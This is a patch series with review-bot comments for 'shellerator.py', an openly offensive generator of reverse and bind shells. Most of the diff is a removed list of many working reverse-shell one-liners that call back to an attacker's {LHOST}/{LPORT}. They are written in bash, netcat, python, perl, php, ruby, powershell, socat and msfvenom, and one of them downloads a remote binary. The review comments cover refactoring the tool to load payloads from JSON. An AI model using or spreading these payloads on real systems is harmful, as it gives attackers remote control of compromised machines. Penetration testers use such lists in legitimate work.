     typeoption = bindshell.add_argument('-t', '--type', dest='TYPE', type=str.lower, help='Type of the shell to generate (Bash, Powershell, Java...)')
     portoption = bindshell.add_argument('-lp', '--lport', dest='LPORT', type=str, help='Listener Port')
+    idoption = bindshell.add_argument('--id', dest='ID', type=str, help='id')
+    quietoption = bindshell.add_argument('--quiet', dest='QUIET', action='store_true', help='QUIET')
     revshell = parser.add_argument_group('Reverse shell options')
     revshell._group_actions.append(typeoption)
     revshell.add_argument('-lh', '--lhost', dest='LHOST', type=str, help='Listener IP address')
     revshell._group_actions.append(portoption)
     options = parser.parse_args()
+
     if options.LIST:
-        list_shells()
+        list_shells(options.TYPE)
+
     if options.SHELLTYPE == 'revshells' and not options.LHOST:
         options.LHOST = select_address()
+
     if not options.LPORT:
         menu_list = [
             'L33t (1337)',
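Review bot: The two new options on the `idoption` and `quietoption` lines carry help strings that only repeat their names (`help='id'`, `help='QUIET'`), so `--help` never says what they select or suppress. Something like `help='Only print the payload with this id (ids are shown by --list)'` and `help='Print the payload only, without banner or colours'` would do, adjusted to what `print_shell` actually does with `options.ID` and `options.QUIET` (that function lies outside this hunk, so the exact wording needs checking). They are also attached to the bind-shell group only, while `typeoption` and `portoption` are mirrored into the reverse-shell group via `_group_actions.append`; if both modes honour them they should be mirrored the same way, or added to `parser` itself so they appear once under the general options.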
@@ -102,140 +115,38 @@ def get_options(): 'DNS (53)', ] options.LPORT = menu_with_custom_choice("Listener port?", menu_list) + if not options.TYPE: shells_dict = globals()[options.SHELLTYPE] menu_list = sorted(list(shells_dict.keys())) options.TYPE = menu('What type of shell do you want?', menu_list) return options -# Helper function for populate_shells() to add values to the dictionnaries -def add_shell(shells_dict, type, shell, notes=None): - if not type in shells_dict.keys(): - shells = [] +def print_shell(shell, lport, lhost): + if options.LHOST is not None: + shell_str = shell['payload'].replace('{LHOST}', lhost).replace('{LPORT}', lport).strip() else: - shells = shells_dict[type] - shells.append((notes, shell)) - shells_dict.update({type:shells}) - -# Add shells to the main dictionnaries: revshells and bindshells -def populate_shells(): - add_shell(revshells, 'bash', '''/bin/bash -c '/bin/bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1' ''') - add_shell(revshells, 'bash', '''/bin/bash -c '/bin/bash -i > /dev/tcp/{LHOST}/{LPORT} 0<&1 2>&1' ''') - add_shell(revshells, 'bash', '''/bin/bash -i > /dev/tcp/{LHOST}/{LPORT} 0<& 2>&1''') - add_shell(revshells, 'bash', '''bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1''') - add_shell(revshells, 'bash', '''exec 5<>/dev/tcp/{LHOST}/{LPORT};cat <&5 | while read line; do $line 2>&5 >&5; done''') - add_shell(revshells, 'bash', '''exec /bin/sh 0&0 2>&0''') - add_shell(revshells, 'bash', '''0<&196;exec 196<>/dev/tcp/{LHOST}/{LPORT}; sh <&196 >&196 2>&196''') - add_shell(shells_dict=revshells, type='bash', notes='UDP', shell='''bash -i >& /dev/udp/{LHOST}/{LPORT} 0>&1''') - add_shell(shells_dict=revshells, type='bash', notes='UDP Listener (attacker)', shell='''nc -u -lvp {LPORT}''') - add_shell(revshells, 'netcat', '''nc -e /bin/sh {LHOST} {LPORT}''') - add_shell(revshells, 'netcat', '''nc -e /bin/bash {LHOST} {LPORT}''') - add_shell(revshells, 'netcat', '''nc -c bash {LHOST} {LPORT}''') - add_shell(revshells, 'netcat', '''mknod backpipe p 
&& nc {LHOST} {LPORT} 0backpipe ''') - add_shell(revshells, 'netcat', '''rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {LHOST} {LPORT} >/tmp/f''') - add_shell(revshells, 'netcat', '''rm -f /tmp/p; mknod /tmp/p p && nc {LHOST} {LPORT} 0/tmp/p 2>&1''') - add_shell(revshells, 'netcat', '''rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc {LHOST} {LPORT} > f''') - add_shell(revshells, 'netcat', '''rm -f x; mknod x p && nc {LHOST} {LPORT} 0x''') - add_shell(revshells, 'ncat', '''ncat {LHOST} {LPORT} -e /bin/bash''') - add_shell(revshells, 'ncat', '''ncat --udp {LHOST} {LPORT} -e /bin/bash''') - add_shell(revshells, 'telnet', '''rm -f /tmp/p; mknod /tmp/p p && telnet {LHOST} {LPORT} 0/tmp/p 2>&1''') - add_shell(revshells, 'telnet', '''telnet {LHOST} {LPORT} | /bin/bash | telnet {LHOST} 667''') - add_shell(revshells, 'telnet', '''rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet {LHOST} {LPORT} > f''') - add_shell(revshells, 'telnet', '''rm -f x; mknod x p && telnet {LHOST} {LPORT} 0x''') - add_shell(revshells, 'socat', '''/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{LHOST}:{LPORT}''') - add_shell(revshells, 'socat', '''socat tcp-connect:{LHOST}:{LPORT} exec:"bash -li",pty,stderr,setsid,sigint,sane''') - add_shell(revshells, 'socat', '''wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{LHOST}:{LPORT}''') - add_shell(shells_dict=revshells, type='socat', notes='Listener (attacker)', shell='''socat file:`tty`,raw,echo=0 TCP-L:{LPORT}''') - add_shell(revshells, 'perl', '''perl -e 'use Socket;$i="{LHOST}";$p={LPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ''') - add_shell(revshells, 'perl', '''perl -MIO -e '$p=fork;exit,if($p);$c=new 
IO::Socket::INET(PeerAddr,"{LHOST}:{LPORT}");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ''') - add_shell(shells_dict=revshells, type='perl', notes='Windows', shell='''perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"{LHOST}:{LPORT}");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ''') - add_shell(revshells, 'python', '''python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{LHOST}",{LPORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ''') - add_shell(revshells, 'python', '''export RHOST="{LHOST}";export RPORT={LPORT};python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' ''') - add_shell(revshells, 'python', '''python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{LHOST}",{LPORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' ''') - add_shell(shells_dict=revshells, type='python', notes='Windows', shell='''C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('{LHOST}', {LPORT})), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in 
[(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"''') - add_shell(revshells, 'php', '''php -r '$sock=fsockopen("{LHOST}",{LPORT});exec("/bin/sh -i <&3 >&3 2>&3");' ''') - add_shell(revshells, 'php', '''php -r '$s=fsockopen("{LHOST}",{LPORT});$proc=proc_open("/bin/sh -i", array(0=>$s, 1=>$s, 2=>$s),$pipes);' ''') - add_shell(revshells, 'php', '''php -r '$s=fsockopen("{LHOST}",{LPORT});shell_exec("/bin/sh -i <&3 >&3 2>&3");' ''') - add_shell(revshells, 'php', '''php -r '$s=fsockopen("{LHOST}",{LPORT});`/bin/sh -i <&3 >&3 2>&3`;' ''') - add_shell(revshells, 'php', '''php -r '$s=fsockopen("{LHOST}",{LPORT});system("/bin/sh -i <&3 >&3 2>&3");' ''') - add_shell(revshells, 
'php', '''php -r '$s=fsockopen("{LHOST}",{LPORT});popen("/bin/sh -i <&3 >&3 2>&3", "r");' ''') - add_shell(revshells, 'php', '''php -r '$s=\'127.0.0.1\';$p=443;@error_reporting(0);@ini_set("error_log",NULL);@ini_set("log_errors",0);@set_time_limit(0);umask(0);if($s=fsockopen($s,$p,$n,$n)){if($x=proc_open(\'/bin/sh$IFS-i\',array(array(\'pipe\',\'r\'),array(\'pipe\',\'w\'),array(\'pipe\',\'w\')),$p,getcwd())){stream_set_blocking($p[0],0);stream_set_blocking($p[1],0);stream_set_blocking($p[2],0);stream_set_blocking($s,0);while(true){if(feof($s))die(\'connection/closed\');if(feof($p[1]))die(\'shell/not/response\');$r=array($s,$p[1],$p[2]);stream_select($r,$n,$n,null);if(in_array($s,$r))fwrite($p[0],fread($s,1024));if(in_array($p[1],$r))fwrite($s,fread($p[1],1024));if(in_array($p[2],$r))fwrite($s,fread($p[2],1024));}fclose($p[0]);fclose($p[1]);fclose($p[2]);proc_close($x);}else{die("proc_open/disabled");}}else{die("not/connect");}' ''') - add_shell(revshells, 'ruby', '''ruby -rsocket -e'f=TCPSocket.open("{LHOST}",{LPORT}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ''') - add_shell(revshells, 'ruby', '''ruby -rsocket -e 'exit if fork;c=TCPSocket.new("{LHOST}","{LPORT}");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ''') - add_shell(shells_dict=revshells, type='ruby', notes='Windows', shell='''ruby -rsocket -e 'c=TCPSocket.new("{LHOST}","{LPORT}");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ''') - add_shell(revshells, 'openssl', '''mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect {LHOST}:{LPORT} > /tmp/s; rm /tmp/s''') - add_shell(shells_dict=revshells, type='openssl', notes='Listener (attacker)', shell='''ncat --ssl -vv -l -p {LPORT}''') - add_shell(revshells, 'powershell', '''powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("{LHOST}",{LPORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 
0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()''') - add_shell(revshells, 'powershell', '''powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('{LHOST}',{LPORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"''') - add_shell(revshells, 'awk', '''awk 'BEGIN {s = "/inet/tcp/0/{LHOST}/{LPORT}"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null''') - add_shell(revshells, 'tclsh', '''echo 'set s [socket {LHOST} {LPORT}];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh''') - add_shell(revshells, 'java', '''r = Runtime.getRuntime() -p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/{LHOST}/{LPORT};cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) -p.waitFor()''') - add_shell(revshells, 'java', '''String host="{LPORT}"; -int port={LPORT}; -String cmd="cmd.exe"; -Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream 
po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();''') - add_shell(shells_dict=revshells, type='java', notes='More stealthy', shell='''Thread thread = new Thread(){public void run(){ //Reverse shell here }}thread.start();''') - add_shell(revshells, 'war', '''msfvenom -p java/jsp_shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f war > reverse.war -strings reverse.war | grep jsp # in order to get the name of the file''') - add_shell(shells_dict=revshells, type='lua', notes='Linux', shell='''lua -e "require('socket');require('os');t=socket.tcp();t:connect('{LHOST}','{LPORT}');os.execute('/bin/sh -i <&3 >&3 2>&3');"''') - add_shell(shells_dict=revshells, type='lua', notes='Windows', shell='''lua5.1 -e 'local host, port = "{LHOST}", {LPORT} local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' ''') - add_shell(revshells, 'nodejs', '''require('child_process').exec('nc -e /bin/sh {LHOST} {LPORT}')''') - add_shell(revshells, 'nodejs', '''-var x = global.process.mainModule.require --x('child_process').exec('nc {LHOST} {LPORT} -e /bin/bash')''') - add_shell(revshells, 'nodejs', '''(function(){ - var net = require("net"), - cp = require("child_process"), - sh = cp.spawn("/bin/sh", []); - var client = new net.Socket(); - client.connect({LPORT}, "{LHOST}", function(){ - client.pipe(sh.stdin); - sh.stdout.pipe(client); - sh.stderr.pipe(client); - }); - return /a/; // Prevents the Node.js application form crashing -})();''') - add_shell(revshells, 'groovy', '''String host="{LHOST}"; -int 
port={LPORT}; -String cmd="cmd.exe"; -Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();''') - add_shell(shells_dict=revshells, type='groovy', notes='More stealthy', shell='''Thread.start { // Reverse shell here }''') - add_shell(revshells, 'meterpreter', '''msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="{LHOST}" LPORT={LPORT} -f elf > shell.elf''') - add_shell(revshells, 'meterpreter', '''msfvenom -p windows/meterpreter/reverse_tcp LHOST="{LHOST}" LPORT={LPORT} -f exe > shell.exe''') - add_shell(revshells, 'meterpreter', '''msfvenom -p osx/x86/shell_reverse_tcp LHOST="{LHOST}" LPORT={LPORT} -f macho > shell.macho''') - add_shell(revshells, 'meterpreter', '''msfvenom -p windows/meterpreter/reverse_tcp LHOST="{LHOST}" LPORT={LPORT} -f asp > shell.asp''') - add_shell(revshells, 'meterpreter', '''msfvenom -p java/jsp_shell_reverse_tcp LHOST="{LHOST}" LPORT={LPORT} -f raw > shell.jsp''') - add_shell(revshells, 'meterpreter', '''msfvenom -p java/jsp_shell_reverse_tcp LHOST="{LHOST}" LPORT={LPORT} -f war > shell.war''') - add_shell(revshells, 'meterpreter', '''msfvenom -p cmd/unix/reverse_python LHOST="{LHOST}" LPORT={LPORT} -f raw > shell.py''') - add_shell(revshells, 'meterpreter', '''msfvenom -p cmd/unix/reverse_bash LHOST="{LHOST}" LPORT={LPORT} -f raw > shell.sh''') - add_shell(revshells, 'meterpreter', '''msfvenom -p cmd/unix/reverse_perl LHOST="{LHOST}" LPORT={LPORT} -f raw > shell.pl''') - add_shell(shells_dict=revshells, type='meterpreter', notes='Windows Staged reverse TCP', shell='''msfvenom -p 
windows/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe > reverse.exe''') - add_shell(shells_dict=revshells, type='meterpreter', notes='Windows Stageless reverse TCP', shell='''msfvenom -p windows/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe > reverse.exe''') - add_shell(shells_dict=revshells, type='meterpreter', notes='Linux Staged reverse TCP', shell='''msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf >reverse.elf''') - add_shell(shells_dict=revshells, type='meterpreter', notes='Linux Stageless reverse TCP', shell='''msfvenom -p linux/x86/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf >reverse.elf''') - - add_shell(bindshells, 'netcat', '''nc -lvp {LPORT} -e /bin/sh''') + shell_str = shell['payload'].replace('{LPORT}', lport).strip() + + if options.QUIET: + return f"{shell_str}" + else: + return f"{Fore.BLUE} {Style.BRIGHT} [{shell['id']}] {Style.RESET_ALL} {shell_str}" + if __name__ == '__main__': - revshells = {} - bindshells = {} - populate_shells() options = get_options() - shells_dict = globals()[options.SHELLTYPE] - print() - for notes, shell in shells_dict[options.TYPE]: - shell_index = shells_dict[options.TYPE].index((notes, shell)) + 1 - if options.LHOST is not None: - print_shell = shell.replace('{LHOST}', options.LHOST).replace('{LPORT}', options.LPORT).strip() + f = open(f"payloads/{options.TYPE}.json") + shells = json.load(f) + + for shell in shells: + if options.ID: + if options.ID == shell['id']: + print(print_shell(shell, options.LPORT, options.LHOST)) else: - print_shell = shell.replace('{LPORT}', options.LPORT).strip() - print_notes = '' - if notes is not None: - print_notes = notes + ' ' - print(Fore.BLUE + Style.BRIGHT + '[' + str(shell_index) + '] ' + print_notes + Style.RESET_ALL + print_shell + '\n') + print(print_shell(shell, options.LPORT, options.LHOST)) + if options.SHELLTYPE == "revshells": cmdline = f'{sys.argv[0]} --reverse-shell --type {options.TYPE} --lhost {options.LHOST} 
--lport {options.LPORT}'
 elif options.SHELLTYPE == "bindshells":
 cmdline = f'{sys.argv[0]} --bind-shell --type {options.TYPE} --lport {options.LPORT}'
- print(Fore.RED + Style.BRIGHT + 'CLI command used\n' + Style.RESET_ALL + cmdline + '\n')
From 7b52f0a7dab046ac76c23714bdca4442403d87a2 Mon Sep 17 00:00:00 2001
From: lapinou
Date: Wed, 17 Apr 2024 01:31:58 +0200
Subject: [PATCH 4/4] Update shellerator.py
---
 shellerator.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/shellerator.py b/shellerator.py
index a066d8c..b7bdf2b 100755
--- a/shellerator.py
+++ b/shellerator.py
@@ -93,8 +93,8 @@ def get_options():
 # typeoptions and portoption are two options either bindshell or revshell will need (https://stackoverflow.com/questions/23775378/allowing-same-option-in-different-argparser-group)
 typeoption = bindshell.add_argument('-t', '--type', dest='TYPE', type=str.lower, help='Type of the shell to generate (Bash, Powershell, Java...)')
 portoption = bindshell.add_argument('-lp', '--lport', dest='LPORT', type=str, help='Listener Port')
- idoption = bindshell.add_argument('--id', dest='ID', type=str, help='id')
- quietoption = bindshell.add_argument('--quiet', dest='QUIET', action='store_true', help='QUIET')
+ idoption = bindshell.add_argument('--id', dest='ID', type=str, help='Only output the payload with this id')
+ quietoption = bindshell.add_argument('--quiet', dest='QUIET', action='store_true', help='Only output the final payload(s)')
 revshell = parser.add_argument_group('Reverse shell options')
 revshell._group_actions.append(typeoption)
 revshell.add_argument('-lh', '--lhost', dest='LHOST', type=str, help='Listener IP address')
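Review bot: The `if not options.TYPE:` branch at the top of this hunk still does `shells_dict = globals()[options.SHELLTYPE]` to build the type menu, but this commit removes the `revshells`/`bindshells` dicts from `__main__`, so running without `-t` now raises `KeyError` instead of prompting; the menu has to come from the files present in `payloads/` (the `*.json` stems) instead. In `__main__` the loop never filters on `shell['direction']`, so `--bind-shell --type netcat` also prints every reverse payload with a literal `{LHOST}` left in it, and an `--id` that matches nothing prints nothing and exits 0. `print_shell` tests the global `options.LHOST` rather than its own `lhost` parameter (`if lhost is not None:`), the JSON handle is again never closed, and `cmdline` is still built but, with the final `print` removed, no longer shown to anyone. `get_options` begins before this hunk.
```python
    wanted = 'reverse' if options.SHELLTYPE == 'revshells' else 'bind'
    with open(f"payloads/{options.TYPE}.json", encoding="utf-8") as f:
        shells = json.load(f)

    matched = 0
    for shell in shells:
        if shell['direction'] != wanted:
            continue
        if options.ID and options.ID != shell['id']:
            continue
        print(print_shell(shell, options.LPORT, options.LHOST))
        matched += 1
    if not matched:
        sys.exit(f"no matching {wanted} payload in payloads/{options.TYPE}.json")
    # … unchanged: cmdline construction …
```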